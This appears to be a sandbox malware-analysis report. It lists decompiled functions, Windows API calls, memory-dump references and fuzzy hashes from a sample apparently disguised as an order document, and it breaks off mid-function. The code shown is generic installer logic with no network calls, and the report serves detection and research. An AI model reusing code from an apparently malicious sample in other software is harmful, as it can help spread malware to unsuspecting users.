Uniqueness Score: -1.00%

Function 0040303E Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040303E(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x424798;
					 *0x4178dc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403146(4);
				if(_t22 >= 0) {
					_t24 = E00405CAA( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x4178dc =  *0x4178dc + 4;
						_t36 = E00403146(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x4178dc =  *0x4178dc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E00405CAA( *0x40a01c, 0x4138d8, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E00405CD9(_a8, 0x4138d8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x4178dc =  *0x4178dc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403042
0x0040304b
0x00403054
0x00403058
0x00403063
0x00403063
0x0040306b
0x00403072
0x00403084
0x0040308b
0x00403130
0x00403130
0x00000000
0x00403091
0x00403094
0x004030a0
0x004030a4
0x0040313e
0x0040313e
0x004030aa
0x004030ad
0x0040310c
0x00403112
0x00403114
0x00403114
0x00403126
0x0040312e
0x00403135
0x00403138
0x00000000
0x00000000
0x00000000
0x00000000
0x004030af
0x004030b2
0x00000000
0x004030b8
0x004030bd
0x004030c4
0x004030c7
0x004030c9
0x004030c9
0x004030d6
0x004030d9
0x004030e0
0x00000000
0x00000000
0x004030e9
0x004030f0
0x00403108
0x00403132
0x00403132
0x004030f2
0x004030f2
0x004030f5
0x004030f8
0x004030fe
0x00403104
0x00000000
0x00403106
0x00000000
0x00403106
0x00403104
0x00000000
0x004030f0
0x00000000
0x004030bd
0x004030b2
0x004030ad
0x004030a4
0x0040308b
0x00403140
0x00403143

APIs

SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 00403063

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
Instruction ID: d45136b7277fa4a4eeb989eab338d16e1e03b20585a5145be81ea7fda6220a17
Opcode Fuzzy Hash: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
Instruction Fuzzy Hash: 6C314F31204259EFDB109F56DD44A9A7FA8EB08759F10803AF905FA190D378DA50DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040246D Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040246D(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B01(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402AC1(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x3c) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x3c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405FF7(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x4247c8 =  *0x4247c8 +  *(_t37 - 4);
				return 0;
			}

0x0040246d
0x0040246d
0x00402472
0x00402479
0x0040247b
0x00402482
0x00402484
0x00402716
0x0040248a
0x0040248d
0x004024a8
0x004024d8
0x004024d8
0x004024da
0x004024aa
0x004024ae
0x004024c7
0x004024ce
0x004024d1
0x004024b0
0x004024b3
0x004024be
0x00402535
0x00000000
0x00000000
0x00000000
0x004024b3
0x004024ae
0x0040253b
0x0040253c
0x0040253c
0x00402954
0x00402960

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,00000011,00000002), ref: 0040253C

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: dfe6487634654fd1de603517f960d75db9e2524c9ca12b0faf19cce1f4693636
Instruction ID: 1b22629e75d9b419b9fa7e371b5212fc4da00fb077cffe61c988f7dc4f8aba71
Opcode Fuzzy Hash: dfe6487634654fd1de603517f960d75db9e2524c9ca12b0faf19cce1f4693636
Instruction Fuzzy Hash: 5511E771A05205EEDB15DF64DA8C5BE7BB4EF05348F20403FE446B72C0D6B88A42DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424770;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x423f0c =  *0x423f0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x423f0c, 0x7530,  *0x423ef4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
Instruction ID: 0b9a08df0e19283e0c47f542131d218e25c17bbe1cc26e2bbd3e30b70dde81e4
Opcode Fuzzy Hash: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
Instruction Fuzzy Hash: FD01F431B202109BE7194B389D05B6A36A8E710315F51823FF951F65F1D778CC038B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E43
EnableWindow.USER32(00000000,00000000), ref: 00401E4E

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 70a93260b027f2004694904072cd59400e64644bb7532fd21934b6a3ced71637
Instruction ID: f710efbc4c9934798fb848b4930091ab6df2b9d686602449302b85490548aed4
Opcode Fuzzy Hash: 70a93260b027f2004694904072cd59400e64644bb7532fd21934b6a3ced71637
Instruction Fuzzy Hash: C8E01272B082119FD714EBB6EA495AD77B4EF40315B11403BE415F11D1DE7888419F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406431 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406431(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004063C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406439
0x0040643c
0x00406443
0x0040644b
0x00406457
0x00000000
0x0040645e
0x0040644e
0x00406455
0x00000000
0x00406466
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
GetProcAddress.KERNEL32(00000000,?), ref: 0040645E

Part of subcall function 004063C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
Part of subcall function 004063C3: wsprintfA.USER32 ref: 00406413
Part of subcall function 004063C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
Instruction ID: 56fda94a1dd54a43fb122a1991fe363568279dfba8e98efda579274c3b941564
Opcode Fuzzy Hash: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
Instruction Fuzzy Hash: E3E086326042105AD2106BB09E0487773A89F84750302883EF946F2140D7389C75ABAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405C32 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405C32(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405c36
0x00405c43
0x00405c58
0x00405c5e

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,80000000,00000003), ref: 00405C36
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405C0D Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C0D(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405c12
0x00405c18
0x00405c1d
0x00405c26
0x00405c26
0x00405c2f

APIs

GetFileAttributesA.KERNELBASE(?,?,00405825,?,?,00000000,00405A08,?,?,?,?), ref: 00405C12
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C26

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction ID: 434021fb132f1a115613134526c1ca1f9a267fea60db19119bc25123d282abd2
Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction Fuzzy Hash: 6FD0C972504121BBD2102728EE0889FBB55DB54271702CA35F8A9A26B1DB304C5A9A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405703 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405703(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405709
0x00405711
0x00000000
0x00405717
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405709
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405717

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
Instruction ID: 9e29868ffe2b43b7798ba1daada82999d34952ab2a4b7d437405be2737e00dc4
Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
Instruction Fuzzy Hash: 0DC04C30225901DADA606F249F087177994FBA0741F1144396146E30E0EA348415ED2D

Uniqueness

Uniqueness Score: -1.00%

Function 100027E4 Relevance: 2.7, APIs: 2, Instructions: 156
memoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E100027E4(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				void* _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004040 != 0 && E10002765(_a4) == 0) {
					 *0x10004044 = _t106;
					if( *0x1000403c != 0) {
						_t106 =  *0x1000403c;
					} else {
						E10002D20(E1000275F(), __ecx);
						 *0x1000403c = _t106;
					}
				}
				_t31 = E100027A1(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002795();
					_t81 = _a4;
					_t90 =  *0x10004048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004048 = _t81;
					E1000278F();
					_t36 = VirtualAlloc(??, ??, ??, ??); // executed
					 *0x1000401c = _t36;
					 *0x10004020 = _t90;
					if( *0x10004040 != 0 && E10002765( *0x10004048) == 0) {
						 *0x1000403c = _t107;
						_t107 =  *0x10004044;
					}
					_t91 =  *0x10004048;
					_a4 = _t91;
					 *0x10004048 =  *((intOrPtr*)(E10002795() + _t91));
					_t40 = E10002773(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E100027A1(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E100027AC() + _a4 + _v8);
							_push(E100027B6());
							if( *0x10004040 <= 0 || E10002765(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004048 == 0) {
						 *0x1000403c = 0;
					}
					_t94 = _a4 + E100027AC();
					 *(E100027BA() + _t94) =  *0x1000401c;
					 *((intOrPtr*)(E100027BE() + _t94)) =  *0x10004020;
					E100027CE(_a4);
					if(E10002781() != 0) {
						 *0x10004058 = GetLastError();
					}
					return _a4;
				}
				_push(E100027AC() + _a4);
				_t65 = E100027B2();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E100027BE();
				_t100 = E100027BA();
				_t103 = E100027B6();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100027f4
0x10002805
0x10002812
0x10002826
0x10002814
0x10002819
0x1000281e
0x1000281e
0x10002812
0x1000282f
0x10002834
0x1000283a
0x1000287e
0x1000287e
0x10002883
0x10002888
0x1000288e
0x10002890
0x10002896
0x100028a3
0x100028a5
0x100028aa
0x100028b7
0x100028ca
0x100028d0
0x100028d6
0x100028d7
0x100028dd
0x100028e9
0x100028ef
0x100028f7
0x100028f8
0x100028fb
0x10002906
0x10002908
0x10002914
0x1000291a
0x10002922
0x1000294e
0x1000294f
0x10002955
0x10002955
0x1000295c
0x10002932
0x10002932
0x10002933
0x10002941
0x1000294a
0x1000294a
0x10002922
0x10002906
0x10002965
0x10002967
0x10002967
0x10002979
0x10002986
0x10002994
0x1000299a
0x100029a8
0x100029b0
0x100029b0
0x100029be
0x100029be
0x10002845
0x10002846
0x1000284b
0x1000284f
0x10002854
0x10002868
0x10002869
0x1000286a
0x1000286c
0x10002871
0x10002873
0x10002873
0x10002876
0x1000287c
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 100028A3
GetLastError.KERNEL32 ref: 100029AA

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
Instruction ID: 7088a7f0c219bdfd589eed4d744adbaf06b55c7882bf085a68ef70f7e309f44b
Opcode Fuzzy Hash: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
Instruction Fuzzy Hash: 385194BA908215DFF711EF60D9C575937A8EB443E0F21842AEA08E721DDF34A9818B55

Uniqueness

Uniqueness Score: -1.00%

Function 004025C4 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025C4(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t38;
				void* _t41;

				_t33 = __edx;
				 *((intOrPtr*)(_t38 - 8)) = __ebx;
				_t27 = E00402A9F(2);
				_t41 = _t27 - 1;
				 *((intOrPtr*)(_t38 - 0x3c)) = _t33;
				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
				if(_t41 < 0) {
					L24:
					 *0x4247c8 =  *0x4247c8 +  *(_t38 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E00406010(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405CAA( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E00405FF7(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
										} else {
